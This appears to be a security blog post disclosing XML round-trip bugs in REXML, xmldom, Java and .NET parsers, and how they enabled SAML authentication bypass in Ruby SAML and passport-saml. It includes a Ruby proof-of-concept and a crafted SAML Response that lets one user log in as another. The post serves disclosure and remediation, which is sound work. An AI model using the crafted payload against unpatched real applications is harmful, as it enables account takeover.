Securing XML implementations across the web

July 28, 2021

Community

In December 2020, we blogged about security issues in Go’s encoding/xml with critical impact on several Go-based SAML implementations. Coordinating the disclosure around those issues was no small feat; we spent months emailing the Go security team, reviewing code, testing and retesting exploits, coming up with workarounds, implementing a validation library, and finally reaching out to SAML library maintainers and 20 different companies downstream.

We’re now ready to take the next step and publicly discuss what came after Go.

Four more languages, four more vulnerable XML parsers

It turns out parsing XML is hard, and parsing and serializing it consistently is even harder. Go’s encoding/xml was far from being the only XML implementation that got it wrong. Digging deeper, we were able to identify four additional major XML parsers in four different languages that were affected by round-trip issues similar to the Go standard library. With two of these, we were also able to confirm identical downstream impact: authentication bypasses in major SAML implementations and web applications.

The affected XML implementations were the following:

REXML (bundled Gem in Ruby versions until 3.0)
xmldom (npm package with ~4M weekly downloads)
Xerces2 Java (the Java reference implementation of XML, bundled with OpenJDK)
System.Xml (.NET Framework)

The round-trip vulnerabilities specific to each XML implementation were reported to the maintainers. We also provided feedback and support during the remediation and reviewed potential fixes to the best of our ability.

The maintainers have now had enough time to either roll out fixes or clearly indicate that no security releases are planned:

REXML and xmldom, the two projects with confirmed downstream impact, both shipped a patch
Oracle has categorized the bugs in OpenJDK as a “Security-in-Depth issue” with a CVSS rating of 0 but are planning to publish a fix in a future CPU
The Xerces and Xalan teams at Apache remain unresponsive
Microsoft has stated the .NET issue “does not meet the definition of a security vulnerability”

What an XML round-trip vulnerability looks like

Although we already kicked off the public disclosure of XML round-trip vulnerabilities in December with Go, we’ve been relatively quiet on the technical details. Notably, we haven’t shared any proof-of-concept code. As you might imagine, this has been intentional. Particularly in the Go case, the downstream ecosystem impact was so wide that we did not feel comfortable sharing anything that could be easily turned into an exploit and used for criminal purposes.

From what we can tell, that helped. Since last year, we’ve had monitoring in place on Mattermost infrastructure capable of reliably detecting exploitation attempts, and so far have not seen a single one.

With the coordinated disclosure of the REXML vulnerabilities, things changed slightly. The disclosure was carried out through HackerOne, and the Ruby team was intent on publicly disclosing our vulnerability report immediately after releasing a patch. Code to reproduce those issues is already out, which means there is no longer a reason not to discuss it here, either.

Exploiting Ruby SAML

A major downstream library affected by the vulnerabilities in REXML was OneLogin’s Ruby SAML. A successful attack could allow full authentication bypass in applications using the SAML authentication method, and that’s a big deal. Those applications included both the cloud and on-premises offerings from GitLab. We also coordinated directly with GitLab on the topic.

As mentioned, the REXML vulnerability report on HackerOne is already public. While it details multiple bugs that can be exploited in a slightly different way, the first code example in the report still demonstrates the high-level issue and the concept of an XML round-trip vulnerability well:

require 'rexml/document'

doc = REXML::Document.new <<XML
<!DOCTYPE x [ <!NOTATION x SYSTEM 'x">]><!--'> ]>
<X>
  <Y/><![CDATA[--><X><Z/><!--]]>-->
</X>
XML

puts "First child in original doc: " + doc.root.elements[1].name
doc = REXML::Document.new doc.to_s
puts "First child after round-trip: " + doc.root.elements[1].name

This simple program parses an XML document—the string between <<XML and XML—prints out the name of the first child element, then serializes it back into a string, parses it again, and once more prints the name of the first child element. Since the document isn’t explicitly modified at any point, running the program against a well-behaving XML implementation should result in the same element name being printed twice.

Running the program against REXML 3.2.4 or earlier would result in the following output instead:

First child in original doc: Y
First child after round-trip: Z

In this specific case, the behavior was caused by a bug in the to_s method of the NotationDecl class. When serializing the system identifier of a notation declaration, mismatching quotes could be generated. This allowed a malicious system identifier to break out of a notation declaration during re-serialization, and to cons/ume parts of the following document, altering it in almost arbitrary ways.

This is how REXML saw the original XML document from the program above:

<!DOCTYPE x [ <!NOTATION x SYSTEM 'x">]><!--'> ]>
<X>
  <Y/><![CDATA[--><X><Z/><!--]]>-->
</X>

■ DTD
■ element
■ CDATA section
■ comment

And this is how it saw it after a round of parsing and serialization:

<!DOCTYPE x [ <!NOTATION x SYSTEM "x">]><!--"> ]>
<X>
  <Y/><![CDATA[--><X><Z/><!--]]>-->
</X>

■ DTD
■ element
■ CDATA section
■ comment

Notice how the markup is identical except for the apostrophes that turned into quotation marks, yet the structure of the document is drastically different. The fix was relatively simple: ensuring that the generated quotation marks always match.

In general terms: an XML document, when parsed and serialized multiple times in a row, could change shape in completely unexpected ways. But you may still be asking yourself: “Why is this a security issue?” More specifically, you may be wondering: “How does this allow bypassing SAML authentication?” The answer is tied to the way SAML implementations often handle cryptographically signed XML documents: encoding round-trips are plentiful because the SAML and XML-DSig specifications make it very difficult to validate documents without them.

In the case of OneLogin’s Ruby SAML, it boiled down to one critical pattern: the cryptographic signatures on SAML Responses—the XML documents that tell an application who the current user is—are only validated after a round-trip through REXML, but the contents of the Response are saved in memory immediately after the first parsing.

Consider the following valid, genuine, and correctly signed SAML Response:

<?xml version="1.0"?>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" [...]>
  [...]
  <Assertion xmlns="urn:oasis:names:tc:SAML:2.0:assertion" [...]>
    <Issuer>https://login.example.com/issuer</Issuer>
    <ds:Signature xmlns:ds="https://www.w3.org/2000/09/xmldsig#">
      [...]
    </ds:Signature>
    <Subject>
      <NameID
        Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress"
        >[email protected]</NameID>
      [...]
    </Subject>
   [...]
  </Assertion>
</samlp:Response>

As long as the signature is valid and the expiry date hasn’t passed, this Response would allow [email protected] to log in to the target application. But what if, instead of logging in, Bob used the Response as part of an exploit by modifying it slightly?

<?xml version="1.0"?>
    <!DOCTYPE foo [
        <!NOTATION x SYSTEM 'x">]><!--'>
    ]>
    <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" [...]>
      [...]
      <Assertion xmlns="urn:oasis:names:tc:SAML:2.0:assertion" [...]>
        <Issuer>https://login.example.com/issuer</Issuer>
        <ds:Signature xmlns:ds="https://www.w3.org/2000/09/xmldsig#">
          [...]
        </ds:Signature>
        <Subject>
          <NameID
            Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress"
            >[email protected]</NameID>
          [...]
        </Subject>
       [...]
      </Assertion>
    <![CDATA[-->
    <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" [...]>
      [...]
      <Assertion xmlns="urn:oasis:names:tc:SAML:2.0:assertion" [...]>
        <Issuer>https://login.example.com/issuer</Issuer>
        <ds:Signature xmlns:ds="https://www.w3.org/2000/09/xmldsig#">
          [...]
        </ds:Signature>
        <Subject>
          <NameID
            Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress"
            >[email protected]</NameID>
          [...]
        </Subject>
       [...]
      </Assertion>
      <!--]]>-->
    </samlp:Response>

This altered Response document would still pass all validation, because after a round-trip through REXML the additions would simply appear as a DTD and a couple of comments, both of which the validator happily ignores. But since the actual data, like the email address of the person logging in, is read before the round-trip, it would no longer match the original. Bob would end up logged in to the application as Alice.

An attacker doesn’t necessarily even need valid credentials to execute the attack: All that’s needed is a signed document of any kind. It could be an expired Response document that a developer pasted on a bug tracker. It could be a LogoutResponse that was intended for an entirely different application that just shares an IDP with the target. Or it could be a metadata document that the attacker requests directly from the IDP.

Impact in xmldom

The xmldom JavaScript library was suffering from bugs very similar to those in REXML. As stated in the advisory for CVE-2021-21366, prior to version 0.5.0, xmldom did not “correctly preserve system identifiers, FPIs or namespaces when repeatedly parsing and serializing maliciously crafted documents.” With a carefully crafted SAML Response, it was possible to bypass authentication in SAML implementations such as samlify, passport-saml, and the Finnish government fork suomifi-passport-saml.

On a high level, an exploit against passport-saml would have looked almost identical to those against Ruby SAML, although the exact syntax required in the crafted document would have been slightly different.

No confirmed impact in .NET or Java

We were also able to identify similar round-trip behaviors in the .NET and Java implementations of XML, but with some mitigating factors: the behaviors were not reproducible in the most typical configurations and usage patterns of those XML APIs, and .NET also providing an implementation of XML-DSig built-in makes it less likely that anyone has to rely on custom code that would end up vulnerable.

Because of those mitigating factors, we were not able to identify any downstream use-cases of the XML implementations that would have been affected by the round-trip behaviors. That’s not to say there aren’t any, but it does at least seem that the vulnerable patterns in .NET and Java are not widespread.

Because we were unable to demonstrate impact, MSRC determined the round-trip behavior in .NET to not constitute a vulnerability. Similarly, Oracle determined the behavior in Java to be a “Security-in-Depth” issue with a CVSS rating of 0. A patch for OpenJDK is planned for a future CPU, but there is no estimated timeline for its availability.

Securing your applications

If you maintain an application in Ruby, JavaScript, .NET, or Java and rely on SAML or other security-critical XML use-cases, the question burning in the back of your mind should be: “How do I patch this?” The good news is that you should already be patched if you use Ruby or JavaScript and update your dependencies regularly. And if you use .NET or Java, there’s probably nothing to worry about.

Beyond that, there are a few simple steps you can take:

For Ruby applications, make sure your REXML Gem is up to date. Use bundler-audit to verify.
For JavaScript applications, similarly make sure your SAML libraries are up to date. Run npm audit to check if a vulnerable version of xmldom is included anywhere as a transitive dependency.
For Java and .NET applications: try to make sure you only use well-known libraries. Review any custom code carefully for XML round-trips and refactor any cases you identify.

You can also always reach out to the Mattermost security team directly with any concerns or questions. Find our contact information in the handbook or connect with us on our Community Server.

Credits

As you’d expect, coordinating vulnerability disclosure across four different programming ecosystems, multiple libraries, and products is not something we could have done without significant help from the dozens of people on the other end. We’d like to extend our thanks to:

The Ruby and REXML maintainers
The xmldom maintainers
Everyone at Apache who helped us figure out Java
Oracle for handling their part of the OpenJDK Xerces fork
MSRC for triaging the .NET issue
GitLab for quick remediation on their end
NCSC-FI and DVV for helping coordinate the xmldom issue downstream

…and everyone else involved who we forgot to mention explicitly!